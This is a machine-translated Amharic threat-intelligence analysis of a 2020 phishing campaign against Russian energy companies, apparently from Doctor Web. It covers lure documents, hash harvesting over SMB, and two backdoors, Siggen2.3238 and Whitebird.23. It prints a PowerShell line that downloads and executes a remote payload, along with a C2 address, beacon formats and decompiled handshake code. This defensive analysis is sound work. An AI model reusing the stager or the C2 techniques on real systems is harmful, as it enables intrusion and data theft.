የኮምፒዩተር ደህንነት ጉዳዮችን የመመርመር ልምዳችን እንደሚያሳየው ኢ-ሜል አሁንም ጥቃት በደረሰባቸው የኔትወርክ መሠረተ ልማት አውታሮች ውስጥ በአጥቂዎች ከሚጠቀሙባቸው በጣም የተለመዱ ቻናሎች አንዱ ነው። አንድ ግድየለሽነት አጠራጣሪ (ወይም አይደለም) ኢሜይል ለበለጠ ኢንፌክሽን መግቢያ ነጥብ ይሆናል፣ ስለዚህ የሳይበር ወንጀለኞች የተለያየ ስኬት ቢኖራቸውም የማህበራዊ ምህንድስና ዘዴዎችን በንቃት ይጠቀማሉ።
በዚህ ልኡክ ጽሁፍ ላይ በርካታ የሩስያ የነዳጅ እና የኢነርጂ ኩባንያዎችን ያነጣጠረ የአይፈለጌ መልዕክት ዘመቻ ላይ ስላደረግነው የቅርብ ጊዜ ምርመራ መነጋገር እንፈልጋለን. ሁሉም ጥቃቶች የውሸት ኢሜይሎችን በመጠቀም ተመሳሳይ ሁኔታን ተከትለዋል, ማንም ሰው በእነዚህ ኢሜይሎች ጽሑፍ ይዘት ላይ ብዙ ጥረት ያደረገ አይመስልም.
ኢንተለጀንስ አገልግሎት
ይህ ሁሉ የተጀመረው እ.ኤ.አ. በኤፕሪል 2020 መጨረሻ ላይ የዶክተር ዌብ ቫይረስ ተንታኞች የአይፈለጌ መልእክት ዘመቻ ባገኙበት ጊዜ ሰርጎ ገቦች በሩሲያ የነዳጅ እና የኢነርጂ ኮምፕሌክስ ውስጥ ላሉ በርካታ ኢንተርፕራይዞች ሰራተኞች የዘመነ የስልክ ማውጫ ላኩ። በእርግጥ ይህ ቀላል የእንክብካቤ ተግባር አልነበረም, ምክንያቱም የማመሳከሪያው መጽሃፍ እውን ስላልሆነ, እና የ.docx ሰነዶች ከሩቅ ሀብቶች ሁለት ምስሎችን ተጭነዋል.
ከመካከላቸው አንዱ ከዜና[.]zannews[.]com አገልጋይ ወደ ተጠቃሚው ኮምፒውተር ወርዷል። የጎራ ስሙ ከካዛክስታን ፀረ-ሙስና ሚዲያ ማዕከል ጎራ ጋር ተመሳሳይ መሆኑ ትኩረት የሚስብ ነው - zannews[.] kz. በሌላ በኩል፣ ጥቅም ላይ የዋለው ጎራ የ ICEFOG የኋላ በርን የተጠቀመውን TOPNEWS በመባል የሚታወቀውን ሌላ የ2015 ዘመቻ የሚያስታውስ ነበር፣ እና የትሮጃን ቁጥጥር ጎራዎች በስማቸው የ"ዜና" ንዑስ ሕብረቁምፊ ነበራቸው። ሌላው አስደሳች ባህሪ ለተለያዩ ተቀባዮች ኢሜይሎችን ሲልኩ የምስል ማውረድ ጥያቄዎች የተለያዩ የጥያቄ መለኪያዎችን ወይም ልዩ የምስል ስሞችን ይጠቀሙ ነበር።
ይህ የተደረገው "ታማኝ" አድራሻን ለመወሰን መረጃን ለመሰብሰብ ነው ብለን እናምናለን, እሱም በመቀጠል ደብዳቤውን በትክክለኛው ጊዜ ይከፍታል. ምስሉን ከሁለተኛው አገልጋይ ለማውረድ የኤስኤምቢ ፕሮቶኮል ጥቅም ላይ የዋለ ሲሆን ይህም የተቀበለውን ሰነድ ከከፈቱ ሰራተኞች ኮምፒውተሮች NetNTLM hashes ለመሰብሰብ ሊደረግ ይችላል.
እና ደብዳቤው ራሱ ከሐሰት ማመሳከሪያ መጽሐፍ ጋር ይኸውና፡-
በዚህ አመት ሰኔ ላይ ሰርጎ ገቦች ምስሎችን ለመስቀል አዲስ የጎራ ስም መጠቀም ጀመሩ፡ ስፖርት[.]manhajnews[.]com. ትንታኔው እንደሚያሳየው የ manhajnews[.] ኮም ንዑስ ጎራዎች ቢያንስ ከሴፕቴምበር 2019 ጀምሮ በአይፈለጌ መልእክት መላኪያዎች ላይ ጥቅም ላይ ውለዋል። የዚህ ዘመቻ ዒላማዎች አንዱ ትልቅ የሩሲያ ዩኒቨርሲቲ ሆነ።
እንዲሁም በሰኔ ወር የጥቃቱ አዘጋጆች ለደብዳቤዎቻቸው አዲስ ጽሑፍ አቅርበዋል-በዚህ ጊዜ ሰነዱ ስለ ኢንዱስትሪ እድገቶች መረጃ ይዟል. የደብዳቤው ጽሁፍ ደራሲው የሩስያ ቋንቋ ተናጋሪ እንዳልነበር ወይም ሆን ብሎ በራሱ ላይ እንዲህ ያለውን ስሜት እንደፈጠረ በግልጽ አመልክቷል. እንደ አለመታደል ሆኖ የኢንደስትሪ ልማት ሀሳቦች እንደ ሁልጊዜው ሽፋን ብቻ ሆነው ተገኝተዋል - ሰነዱ እንደገና ሁለት ምስሎችን አውርዷል፣ አገልጋዩ ወደ ማውረድ ሲቀየር[.]inklingpaper[.]com።
የሚቀጥለው ፈጠራ በጁላይ ተከተለ. በጸረ-ቫይረስ ፕሮግራሞች ተንኮል-አዘል ሰነዶችን ፈልጎ ለማግኘት በመሞከር አጥቂዎች የማይክሮሶፍት ዎርድን በይለፍ ቃል የተመሰጠሩ ሰነዶችን መጠቀም ጀመሩ። በተመሳሳይ ጊዜ, አጥቂዎቹ ክላሲክ የማህበራዊ ምህንድስና ዘዴን ለመጠቀም ወሰኑ - የሽልማት ማስታወቂያ.
የይግባኙ ጽሑፍ እንደገና በተመሳሳይ ዘይቤ ተጽፏል, ይህም በአድራሻው መካከል ተጨማሪ ጥርጣሬን አስከትሏል. ምስሉን የሚያወርድበት አገልጋይም አልተለወጠም።
በሁሉም ሁኔታዎች፣ በደብዳቤ[.]ru እና yandex[.]ru ጎራዎች የተመዘገቡ ኢሜይሎች ደብዳቤዎችን ለመላክ ያገለግሉ እንደነበር ልብ ይበሉ።
ጥቃት
በሴፕቴምበር 2020 መጀመሪያ ላይ፣ የእርምጃ ጊዜው ነው። የኛ የቫይረስ ተንታኞች አዲስ የጥቃት ማዕበል አግኝተዋል፣በዚህም አጥቂዎቹ የስልክ ማውጫውን በማዘመን ሰበብ በድጋሚ ደብዳቤ ልከዋል። ሆኖም፣ በዚህ ጊዜ ዓባሪው ተንኮል አዘል ማክሮ ይዟል።
የተያያዘውን ሰነድ ሲከፍት ማክሮው ሁለት ፋይሎችን ፈጠረ፡-
- የባች ፋይሉን ለማስኬድ የታሰበ VBS ስክሪፕት %APPDATA% ማይክሮሶፍትዌር ጀምር menuprogramsstartupadoba.vbs;
- የባች ፋይል %APPDATA%configstest.bat እራሱ ተሸፍኗል።
የሥራው ዋና ነገር የ Powershell ሼልን ከተወሰኑ መመዘኛዎች ጋር ማስጀመር ነው. ወደ ዛጎሉ የተላለፉ መለኪያዎች ወደ ትዕዛዞች ተከፍለዋል፡-
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;ከቀረቡት ትእዛዞች እንደሚታየው፣ ክፍያው የተጫነበት ጎራ እንደገና እንደ የዜና ጣቢያ ተመስሏል። ቀላል , ብቸኛው ስራው የሼልኮድ ኮድን ከመቆጣጠሪያ አገልጋይ መቀበል እና ማስፈጸም ነው. በተጠቂው ፒሲ ላይ ሊጫኑ የሚችሉ ሁለት አይነት የኋላ በሮች መለየት ችለናል።
BackDoor.Siggen2.3238
የመጀመሪያው ነው። BackDoor.Siggen2.3238 - ከዚህ ቀደም በእኛ ስፔሻሊስቶች አላገኘም, ነገር ግን ይህን ፕሮግራም በሌሎች ፀረ-ቫይረስ አቅራቢዎች የተጠቀሰው ነገር አልተገኘም.
ይህ ፕሮግራም በ C++ የተጻፈ የጀርባ በር ሲሆን በ 32 ቢት ዊንዶውስ ኦኤስ ላይ ይሰራል።
BackDoor.Siggen2.3238 በሁለት ፕሮቶኮሎች ማለትም HTTP እና HTTPS ከመቆጣጠሪያ አገልጋይ ጋር መገናኘት ይችላል። የተመረመረው ናሙና HTTPS ፕሮቶኮልን ይጠቀማል። የአገልጋይ ጥያቄዎች የሚከተለውን የተጠቃሚ-ወኪል ይጠቀማሉ፡-
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
በዚህ አጋጣሚ ሁሉም ጥያቄዎች ከሚከተሉት የመለኪያዎች ስብስብ ጋር ይቀርባሉ፡
%s;type=%s;length=%s;realdata=%send
እያንዳንዱ መስመር %s በቅደም ተከተል በሚተካበት፡-
- የተበከለው ኮምፒዩተር መለያ ፣
- የሚላከው የጥያቄ ዓይነት፣
- በሪልዳታ መስክ ውስጥ ያለው የውሂብ ርዝመት ፣
- መረጃ
ስለተበከለው ስርዓት መረጃን በሚሰበስብበት ደረጃ ላይ ፣ የኋለኛው በር እንደዚህ ያለ ሕብረቁምፊ ይፈጥራል።
lan=%s;cmpname=%s;username=%s;version=%s;
ላን የተበከለው ኮምፒዩተር አይፒ አድራሻ ሲሆን ሴኤምፒስም የኮምፒዩተር ስም ነው ፣ የተጠቃሚ ስም የተጠቃሚ ስም ነው ፣ እትም string 0.0.4.03 ነው።
ይህ ከመለያ ሲሲንፎ ጋር ያለው መረጃ በPOST ጥያቄ በኩል https[፡]//31.214[.]157.14/log.txt ላይ ወዳለው የአስተዳደር አገልጋይ ይላካል። ምላሽ ከሆነ BackDoor.Siggen2.3238 የHEART ምልክት ይቀበላል፣ግንኙነቱ እንደተሳካ ይቆጠራል፣እና የኋላ በር ከአገልጋዩ ጋር ዋናውን የግንኙነት ዑደት ይጀምራል።
ስለ የአሠራር መርሆዎች የበለጠ የተሟላ መግለጫ BackDoor.Siggen2.3238 በእኛ ውስጥ ነው። .
BackDoor.Whitebird.23
ሁለተኛው ፕሮግራም የኋለኛውን በር ማሻሻያ ነው BackDoor.Whitebird ካዛክስታን ውስጥ ካለው የመንግስት ተቋም ጋር ከተፈጠረው ክስተት አስቀድሞ የምናውቀው ነው። ይህ እትም በC++ የተፃፈ ሲሆን በሁለቱም 32 ቢት እና 64 ቢት የዊንዶውስ ኦፐሬቲንግ ሲስተሞች ላይ ለመስራት የተነደፈ ነው።
ልክ እንደ አብዛኛዎቹ የዚህ አይነት ፕሮግራሞች, BackDoor.Whitebird.23 ከትእዛዝ እና ቁጥጥር አገልጋይ ጋር የተመሰጠረ ግንኙነት ለመመስረት እና የተበከለ ኮምፒዩተርን ያልተፈቀደ ቁጥጥር ለማድረግ የተነደፈ። ጠብታ በመጠቀም በተበላሸ ስርዓት ውስጥ ተጭኗል .
የመረመርነው ናሙና ሁለት ኤክስፖርት ያለው ተንኮል አዘል ቤተ-መጽሐፍት ነበር፡-
- ጎግል ጨዋታ፣
- ሙከራ.
በስራው መጀመሪያ ላይ በ XOR ኦፕሬሽን በባይት 0x99 ላይ የተመሰረተ ስልተ ቀመር በኋለኛው በር አካል ላይ የተሰፋውን ውቅር ዲክሪፕት ያደርጋል። አወቃቀሩ ይህን ይመስላል፡-
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
ቋሚ ስራውን ለማረጋገጥ የኋለኛው በር በመስክ ላይ የተገለጸውን ዋጋ ይለውጣል የስራ ሰዓት ማዋቀር. መስኩ 1440 ወይም 0 እሴቶችን የሚወስድ እና በእያንዳንዱ ሰዓት ውስጥ በየደቂቃው የሚወክለው 1 ባይት ይዟል። በበይነገጹ ላይ ለሚያዳምጠው ለእያንዳንዱ የአውታረ መረብ በይነገጽ የተለየ ክር ይፈጥራል እና ከተያዘው ኮምፒውተር በተኪ አገልጋይ ላይ የፍቃድ ፓኬቶችን ይፈልጋል። እንደዚህ ያለ ፓኬት ሲገኝ የኋለኛው በር ስለ ተኪ አገልጋዩ መረጃ ወደ ዝርዝሩ ይጨምራል። በተጨማሪም, በዊንኤፒአይ በኩል ተኪ መኖሩን ይፈትሻል የኢንተርኔት ጥያቄ አማራጭW.
ፕሮግራሙ የአሁኑን ደቂቃ እና ሰዓት ይፈትሻል እና በመስክ ላይ ካለው መረጃ ጋር ያወዳድራል። የስራ ሰዓት ማዋቀር. የቀኑ ተዛማጅ ደቂቃ ዋጋ ዜሮ ካልሆነ ከመቆጣጠሪያ አገልጋዩ ጋር ግንኙነት ይፈጥራል።
ከአገልጋዩ ጋር ግንኙነት መመስረት በደንበኛው እና በአገልጋዩ መካከል የTLS ስሪት 1.0 ግንኙነት መፍጠርን ያስመስላል። የኋለኛው በር አካል ሁለት መከላከያዎችን ይይዛል።
የመጀመሪያው ቋት የTLS ስሪት 1.0 Client Hello ጥቅል ይዟል።
ሁለተኛው ቋት TLS 1.0 የደንበኛ ቁልፍ ልውውጥ ፓኬጆችን ከ 0x100 ባይት ቁልፍ ርዝመት፣ የCipher Spec ቀይር፣ የተመሰጠረ የእጅ መጨባበጥ መልእክት ይዟል።
የደንበኛ ሄሎ ፓኬት ሲላክ የኋለኛው በር 4 ባይት የአሁኑን ጊዜ እና 28 ባይት የውሸት የዘፈቀደ መረጃ በ Client Random መስክ ውስጥ እንደሚከተለው ይሰላል።
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
የተቀበለው ፓኬት ወደ መቆጣጠሪያ አገልጋይ ይላካል. በምላሹ (የአገልጋይ ሄሎ ፓኬት) የሚከተሉት ምልክት ይደረግባቸዋል፡-
- የ TLS ፕሮቶኮል ስሪት 1.0 ማክበር;
- የጊዜ ማህተም (የመጀመሪያዎቹ 4 ባይት የዘፈቀደ ውሂብ ፓኬት መስክ) በአገልጋዩ ከተገለጸው የጊዜ ማህተም ጋር በደንበኛው የተገለጸው;
- በደንበኛው እና በአገልጋዩ ላይ ባለው የዘፈቀደ መረጃ መስክ ውስጥ ካለው የጊዜ ማህተም በኋላ የመጀመሪያዎቹ 4 ባይት ግጥሚያ።
የተወሰኑ ግጥሚያዎች ካሉ፣ የጓሮ በር የደንበኛ ቁልፍ ልውውጥ ፓኬት ያዘጋጃል። ይህንን ለማድረግ በደንበኛ ቁልፍ ልውውጥ ፓኬጅ ውስጥ ያለውን የህዝብ ቁልፍ እንዲሁም ኢንክሪፕትድ የእጅ መጨባበጥ መልእክት ፓኬጅ ውስጥ የኢንክሪፕሽን IV እና የኢንክሪፕሽን ዳታ ይቀይራል።
የኋለኛው በር ፓኬጁን ከትእዛዝ እና ቁጥጥር አገልጋይ ይቀበላል ፣የTLS ፕሮቶኮል ሥሪት 1.0 መሆኑን ያረጋግጣል እና ከዚያ ሌላ 54 ባይት (የፓኬት አካል) ይቀበላል። ይህ የግንኙነት ቅንጅቱን ያጠናቅቃል።
ስለ የአሠራር መርሆዎች የበለጠ የተሟላ መግለጫ BackDoor.Whitebird.23 በእኛ ውስጥ ነው። .
መደምደሚያ እና መደምደሚያ
የሰነዶች፣ የማልዌር እና ያገለገሉ መሠረተ ልማቶች ትንተና ጥቃቱ የተዘጋጀው በአንዱ የቻይና ኤፒቲ ቡድን እንደሆነ በእርግጠኝነት እንድንናገር ያስችለናል። የተሳካ ጥቃት በሚደርስበት ጊዜ በተጠቂዎች ኮምፒውተሮች ላይ የሚጫኑትን የጓሮ በሮች ተግባራዊነት ከግምት ውስጥ በማስገባት ኢንፌክሽኑ ቢያንስ ከተጠቁት ድርጅቶች ኮምፒውተሮች ሚስጥራዊ መረጃን ወደ መስረቅ ያመራል።
በተጨማሪም፣ በጣም የሚገርም ሁኔታ ልዩ ተግባር ባላቸው የአካባቢ አገልጋዮች ላይ ልዩ ትሮጃኖች መጫን ነው። እነዚህም የጎራ ተቆጣጣሪዎች፣ የፖስታ ሰርቨሮች፣ የኢንተርኔት መግቢያዎች፣ ወዘተ ሊሆኑ ይችላሉ።በምሳሌው ላይ እንዳየነው , እንደዚህ ያሉ አገልጋዮች በተለያዩ ምክንያቶች ለአጥቂዎች ልዩ ትኩረት ይሰጣሉ.
ምንጭ: hab.com